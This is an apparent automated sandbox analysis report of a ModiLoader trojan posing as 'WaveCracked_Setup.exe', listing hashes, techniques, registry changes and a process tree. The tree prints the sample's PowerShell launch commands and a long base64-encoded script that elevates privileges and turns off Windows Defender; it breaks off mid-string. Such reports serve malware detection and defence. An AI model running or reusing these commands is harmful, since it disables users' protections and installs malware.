modiloader | 38c3b07b574abc69b31efc0f98c252214551dd526948293a6f70b79f54dd8bb3

Analysis

max time kernel
395s
max time network
380s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11/01/2025, 22:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WaveCracked_Setup.exe
Size

45KB
MD5

7101449b9a90ea416179cefbb79bf959
SHA1

32d2be427b63fd96a14ded9d64a68ff05a674fdb
SHA256

38c3b07b574abc69b31efc0f98c252214551dd526948293a6f70b79f54dd8bb3
SHA512

6ce87169bb0cf49b5fb1fbf21040cbc2367da7abacb3cce0eaac0142ee59bd43508a27d5eb45ca5c3b1269dfccfb1b2cf50df048f694cc98d501768b271d2f82
SSDEEP

768:aH4QlpbwGgC7eNB9kTvObyCawfTWccGLrrd9w3NGuDgN:6lpVgi7Obl9faoLrrd9cGuc

Score

10^/10

modiloader aspackv2 discovery evasion execution trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	powershell.exe

Modiloader family
modiloader

ModiLoader Second Stage 3 IoCs

resource	yara_rule
behavioral1/memory/3420-29-0x0000000000400000-0x0000000000545000-memory.dmp	modiloader_stage2
behavioral1/memory/3420-30-0x0000000000400000-0x0000000000545000-memory.dmp	modiloader_stage2
behavioral1/memory/3420-31-0x0000000000400000-0x0000000000545000-memory.dmp	modiloader_stage2

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x001d00000002aabf-23.dat	aspack_v212_v242

Executes dropped EXE 5 IoCs

pid	Process
3420	tmp1B72.tmp.exe
1616	tmp6696.tmp.exe
2956	tmp12A6.tmp.exe
4192	tmpCF8E.tmp.exe
1712	tmpE309.tmp.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
3248	powershell.exe
4924	powershell.exe
4640	powershell.exe
4344	powershell.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp1B72.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp6696.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp12A6.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpCF8E.tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmpE309.tmp.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4836	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133811075060193844"	chrome.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
3248	powershell.exe
3248	powershell.exe
4924	powershell.exe
4924	powershell.exe
4640	powershell.exe
4640	powershell.exe
4344	powershell.exe
4344	powershell.exe
4348	powershell.exe
4348	powershell.exe
1132	WaveCracked_Setup.exe
3160	chrome.exe
3160	chrome.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe
1132	WaveCracked_Setup.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1132	WaveCracked_Setup.exe
Token: SeIncBasePriorityPrivilege	1132	WaveCracked_Setup.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeBackupPrivilege	584	vssvc.exe
Token: SeRestorePrivilege	584	vssvc.exe
Token: SeAuditPrivilege	584	vssvc.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe
Token: SeShutdownPrivilege	3160	chrome.exe
Token: SeCreatePagefilePrivilege	3160	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1616	tmp6696.tmp.exe
2956	tmp12A6.tmp.exe
4192	tmpCF8E.tmp.exe
4292	OpenWith.exe
1564	OpenWith.exe
1712	tmpE309.tmp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1132 wrote to memory of 3456	1132	WaveCracked_Setup.exe	78
PID 1132 wrote to memory of 3456	1132	WaveCracked_Setup.exe	78
PID 3456 wrote to memory of 3248	3456	cmd.exe	80
PID 3456 wrote to memory of 3248	3456	cmd.exe	80
PID 3248 wrote to memory of 3420	3248	powershell.exe	81
PID 3248 wrote to memory of 3420	3248	powershell.exe	81
PID 3248 wrote to memory of 3420	3248	powershell.exe	81
PID 1132 wrote to memory of 2380	1132	WaveCracked_Setup.exe	82
PID 1132 wrote to memory of 2380	1132	WaveCracked_Setup.exe	82
PID 2380 wrote to memory of 4924	2380	cmd.exe	84
PID 2380 wrote to memory of 4924	2380	cmd.exe	84
PID 4924 wrote to memory of 1616	4924	powershell.exe	85
PID 4924 wrote to memory of 1616	4924	powershell.exe	85
PID 4924 wrote to memory of 1616	4924	powershell.exe	85
PID 1132 wrote to memory of 3404	1132	WaveCracked_Setup.exe	86
PID 1132 wrote to memory of 3404	1132	WaveCracked_Setup.exe	86
PID 3404 wrote to memory of 4640	3404	cmd.exe	88
PID 3404 wrote to memory of 4640	3404	cmd.exe	88
PID 4640 wrote to memory of 2956	4640	powershell.exe	89
PID 4640 wrote to memory of 2956	4640	powershell.exe	89
PID 4640 wrote to memory of 2956	4640	powershell.exe	89
PID 1132 wrote to memory of 3640	1132	WaveCracked_Setup.exe	94
PID 1132 wrote to memory of 3640	1132	WaveCracked_Setup.exe	94
PID 3640 wrote to memory of 4344	3640	cmd.exe	96
PID 3640 wrote to memory of 4344	3640	cmd.exe	96
PID 4344 wrote to memory of 4192	4344	powershell.exe	97
PID 4344 wrote to memory of 4192	4344	powershell.exe	97
PID 4344 wrote to memory of 4192	4344	powershell.exe	97
PID 1132 wrote to memory of 4348	1132	WaveCracked_Setup.exe	110
PID 1132 wrote to memory of 4348	1132	WaveCracked_Setup.exe	110
PID 3160 wrote to memory of 4848	3160	chrome.exe	117
PID 3160 wrote to memory of 4848	3160	chrome.exe	117
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1336	3160	chrome.exe	118
PID 3160 wrote to memory of 1352	3160	chrome.exe	119
PID 3160 wrote to memory of 1352	3160	chrome.exe	119

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\WaveCracked_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\WaveCracked_Setup.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3420
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4924
  - - C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IwAgAHQAaABhAG4AawBzACAAdABvACAAaAB0AHQAcABzADoALwAvAHMAdQBwAGUAcgB1AHMAZQByAC4AYwBvAG0ALwBhAC8AMQA2ADQAOAAxADAANQANAAoAIwAjACMAIwAgAFMAVABBAFIAVAAgAEUATABFAFYAQQBUAEUAIABUAE8AIABBAEQATQBJAE4AIAAjACMAIwAjACMADQAKAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAZgBhAGwAcwBlACkAXQBbAHMAdwBpAHQAYwBoAF0AJABzAGgAbwB1AGwAZABBAHMAcwB1AG0AZQBUAG8AQgBlAEUAbABlAHYAYQB0AGUAZAAsACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABmAGEAbABzAGUAKQBdACAAWwBTAHQAcgBpAG4AZwBdACQAdwBvAHIAawBpAG4AZwBEAGkAcgBPAHYAZQByAHIAaQBkAGUAKQANAAoADQAKACMAIABJAGYAIABwAGEAcgBhAG0AZQB0AGUAcgAgAGkAcwAgAG4AbwB0ACAAcwBlAHQALAAgAHcAZQAgAGEAcgBlACAAcAByAG8AcABhAGIAbAB5ACAAaQBuACAAbgBvAG4ALQBhAGQAbQBpAG4AIABlAHgAZQBjAHUAdABpAG8AbgAuACAAVwBlACAAcwBlAHQAIABpAHQAIAB0AG8AIAB0AGgAZQAgAGMAdQByAHIAZQBuAHQAIAB3AG8AcgBrAGkAbgBnACAAZABpAHIAZQBjAHQAbwByAHkAIABzAG8AIAB0AGgAYQB0AA0ACgAjACAAIAB0AGgAZQAgAHcAbwByAGsAaQBuAGcAIABkAGkAcgBlAGMAdABvAHIAeQAgAG8AZgAgAHQAaABlACAAZQBsAGUAdgBhAHQAZQBkACAAZQB4AGUAYwB1AHQAaQBvAG4AIABvAGYAIAB0AGgAaQBzACAAcwBjAHIAaQBwAHQAIABpAHMAIAB0AGgAZQAgAGMAdQByAHIAZQBuAHQAIAB3AG8AcgBrAGkAbgBnACAAZABpAHIAZQBjAHQAbwByAHkADQAKAGkAZgAoAC0AbgBvAHQAKAAkAFAAUwBCAG8AdQBuAGQAUABhAHIAYQBtAGUAdABlAHIAcwAuAEMAbwBuAHQAYQBpAG4AcwBLAGUAeQAoACcAdwBvAHIAawBpAG4AZwBEAGkAcgBPAHYAZQByAHIAaQBkAGUAJwApACkAKQANAAoAewANAAoAIAAgACAAIAAkAHcAbwByAGsAaQBuAGcARABpAHIATwB2AGUAcgByAGkAZABlACAAPQAgACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAuAFAAYQB0AGgADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABUAGUAcwB0AC0AQQBkAG0AaQBuACAAewANAAoAIAAgACAAIAAkAGMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsACAAJAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAA0ACgAgACAAIAAgACQAYwB1AHIAcgBlAG4AdABVAHMAZQByAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AGkAbgBSAG8AbABlAF0AOgA6AEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAKQANAAoAfQANAAoADQAKACMAIABJAGYAIAB3AGUAIABhAHIAZQAgAGkAbgAgAGEAIABuAG8AbgAtAGEAZABtAGkAbgAgAGUAeABlAGMAdQB0AGkAbwBuAC4AIABFAHgAZQBjAHUAdABlACAAdABoAGkAcwAgAHMAYwByAGkAcAB0ACAAYQBzACAAYQBkAG0AaQBuAA0ACgBpAGYAIAAoACgAVABlAHMAdAAtAEEAZABtAGkAbgApACAALQBlAHEAIAAkAGYAYQBsAHMAZQApACAAIAB7AA0ACgAgACAAIAAgAGkAZgAgACgAJABzAGgAbwB1AGwAZABBAHMAcwB1AG0AZQBUAG8AQgBlAEUAbABlAHYAYQB0AGUAZAApACAAewANAAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgBFAGwAZQB2AGEAdABpAG4AZwAgAGQAaQBkACAAbgBvAHQAIAB3AG8AcgBrACAAOgAoACIADQAKACAAIAAgACAAIAAgACAAIABlAHgAaQB0AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAdgB2AHYAdgB2ACAAYQBkAGQAIABgAC0AbgBvAGUAeABpAHQAYAAgAGgAZQByAGUAIABmAG8AcgAgAGIAZQB0AHQAZQByACAAZABlAGIAdQBnAGcAaQBuAGcAIAB2AHYAdgB2AHYAIAANAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAKAAnAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAGYAaQBsAGUAIAAiAHsAMAB9ACIAIAAtAHMAaABvAHUAbABkAEEAcwBzAHUAbQBlAFQAbwBCAGUARQBsAGUAdgBhAHQAZQBkACAALQB3AG8AcgBrAGkAbgBnAEQAaQByAE8AdgBlAHIAcgBpAGQAZQAgACIAewAxAH0AIgAnACAALQBmACAAKAAkAG0AeQBpAG4AdgBvAGMAYQB0AGkAbwBuAC4ATQB5AEMAbwBtAG0AYQBuAGQALgBEAGUAZgBpAG4AaQB0AGkAbwBuACwAIAAiACQAdwBvAHIAawBpAG4AZwBEAGkAcgBPAHYAZQByAHIAaQBkAGUAIgApACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABlAHgAaQB0AA0ACgB9AA0ACgANAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAiACQAdwBvAHIAawBpAG4AZwBEAGkAcgBPAHYAZQByAHIAaQBkAGUAIgANAAoAIwAjACMAIwAjACAARQBOAEQAIABFAEwARQBWAEEAVABFACAAVABPACAAQQBEAE0ASQBOACAAIwAjACMAIwAjAA0ACgANAAoAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAHcAbwByAGsAaQBuAGcARABpAHIATwB2AGUAcgByAGkAZABlAA0ACgANAAoAJABEAGUAZgBlAG4AZABlAHIAUABhAHQAaAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAPQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACIADQAKAA0ACgAjACQAUABvAGwAaQBjAHkATQBhAG4AYQBnAGUAcgBLAGUAeQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAD0AIAAiAFAAbwBsAGkAYwB5ACAATQBhAG4AYQBnAGUAcgAiAA0ACgAkAFIAZQBhAGwAVABpAG0AZQBQAHIAbwB0AGUAYwB0AGkAbwBuAEsAZQB5ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA9ACAAIgBSAGUAYQBsAC0AVABpAG0AZQAgAFAAcgBvAHQAZQBjAHQAaQBvAG4AIgANAAoAJABTAGkAZwBuAGEAdAB1AHIAZQBVAHAAZABhAHQAZQBzAEsAZQB5ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAPQAgACIAUwBpAGcAbgBhAHQAdQByAGUAIABVAHAAZABhAHQAZQBzACIADQAKACQAUwBwAHkAbgBlAHQASwBlAHkAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAD0AIAAiAFMAcAB5AG4AZQB0ACIADQAKAA0ACgAkAEEAbABsAG8AdwBGAGEAcwB0AFMAZQByAHYAaQBjAGUAUwB0AGEAcgB0AHUAcABWAGEAbAB1AGUAIAAgACAAIAAgACAAIAA9ACAAIgBBAGwAbABvAHcARgBhAHMAdABTAGUAcgB2AGkAYwBlAFMAdABhAHIAdAB1AHAAIgANAAoAJABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQBWAGEAbAB1AGUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAPQAgACIARABpAHMAYQBiAGwAZQBBAG4AdABpAFMAcAB5AHcAYQByAGUAIgANAAoAJABEAGkAcwBhAGIAbABlAEEAbgB0AGkAVgBpAHIAdQBzAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAPQAgACIARABpAHMAYQBiAGwAZQBBAG4AdABpAFYAaQByAHUAcwAiAA0ACgAkAEQAaQBzAGEAYgBsAGUAUgBvAHUAdABpAG4AZQBsAHkAVABhAGsAaQBuAGcAQQBjAHQAaQBvAG4AVgBhAGwAdQBlACAAIAA9ACAAIgBEAGkAcwBhAGIAbABlAFIAbwB1AHQAaQBuAGUAbAB5AFQAYQBrAGkAbgBnAEEAYwB0AGkAbwBuACIADQAKACQARABpAHMAYQBiAGwAZQBTAHAAZQBjAGkAYQBsAFIAdQBuAG4AaQBuAGcATQBvAGQAZQBzAFYAYQBsAHUAZQAgACAAIAAgAD0AIAAiAEQAaQBzAGEAYgBsAGUAUwBwAGUAYwBpAGEAbABSAHUAbgBuAGkAbgBnAE0AbwBkAGUAcwAiAA0ACgAkAFMAZQByAHYAaQBjAGUASwBlAGUAcABBAGwAaQB2AGUAVgBhAGwAdQ